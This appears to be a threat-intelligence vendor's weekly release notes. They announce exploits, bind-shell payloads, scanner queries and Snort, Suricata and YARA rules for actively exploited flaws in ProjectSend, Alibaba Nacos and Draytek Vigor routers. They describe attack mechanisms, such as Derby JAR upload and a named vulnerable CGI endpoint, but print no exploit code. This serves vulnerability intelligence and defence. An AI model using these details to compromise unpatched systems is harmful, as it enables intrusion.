Happy Friday! Happy Thanksgiving to our US-based customers! The following are the VulnCheck Initial Access release notes for this holiday shortened week:
On Monday, the team reserved a CVE for a vulnerability we believed to be exploited in the wild. On the same day we delivered an exploit, version scanner, search engine queries, network signatures, a vulnerable docker compose, and a YARA rule. The team published the CVE, CVE-2024-11680, on Tuesday and provided wider intelligence to the community about exploitation in the wild. You can read the blog: ProjectSend CVE-2024-11680 Exploited in the Wild.
If you are a US-based reader, you likely will not have heard of Alibaba Nacos. However, its decently popular in Asia with FOFA reporting ~100,000 installations, and ZoomEye reporting more than 300,000. It should also be noted up front that the team believes this vulnerability has not been patched so is still applicable today.
By default Nacos running in standalone mode exposes an Apache Derby database to unauthenticated users, which allows for arbitrary querying of data. The component required for authentication is not patched (current 2.3.2) as stated in the initial advisory and in standalone mode continues to allow unauthenticated queries. Recently a variant of the 2021 vulnerability was published that identified a new mechanism for uploading JAR files and registering Java classes into the Derby SQL functions, which allowed for a previously undocumented path to remote code execution.
The team developed a payload class in JDK 8 and an exploit that will work against the well documented 1.4.0 pre-CVE-2021-29442 vulnerability as well as a race condition in the 2.4.x version that requires many requests to be sent to trigger the JAR file being written to disk. The team additionally developed Suricata, YARA, and Snort rules for the vulnerabilities.
Draytek Vigor routers models 300B, 2960, and 3900 before version 1.5.1 are affected by this remote code execution vulnerability. This vulnerability has been known to be exploited by at least two named threat actors, including, most recently, Flax Typhoon. The vulnerability consists of unsafe handling of user input in the login functionality. The team had previously delivered Snort and Suricata signatures, and Shodan, Censys, and GreyNoise queries. Today the team adds an exploit with a bind shell payload, along with another pcap of our proof of concept, and ZoomEye and FOFA queries.
Draytek Vigor routers models 300B, 2960, and 3900 before version 1.5.1 are affected by this remote code execution vulnerability, and exploitation in the wild has been observed by the threat actor group Flax Typhoon. The vulnerability consists of a parsing error in the /cgi-bin/mainfunction.cgi/cvmcfgupload endpoint when a multipart request is sent with the Content-Type: x-python-script. The team delivered an exploit with a bind shell payload, a pcap, Snort and Suricata signatures, and Shodan, Censys, ZoomEye, FOFA, and GreyNoise queries.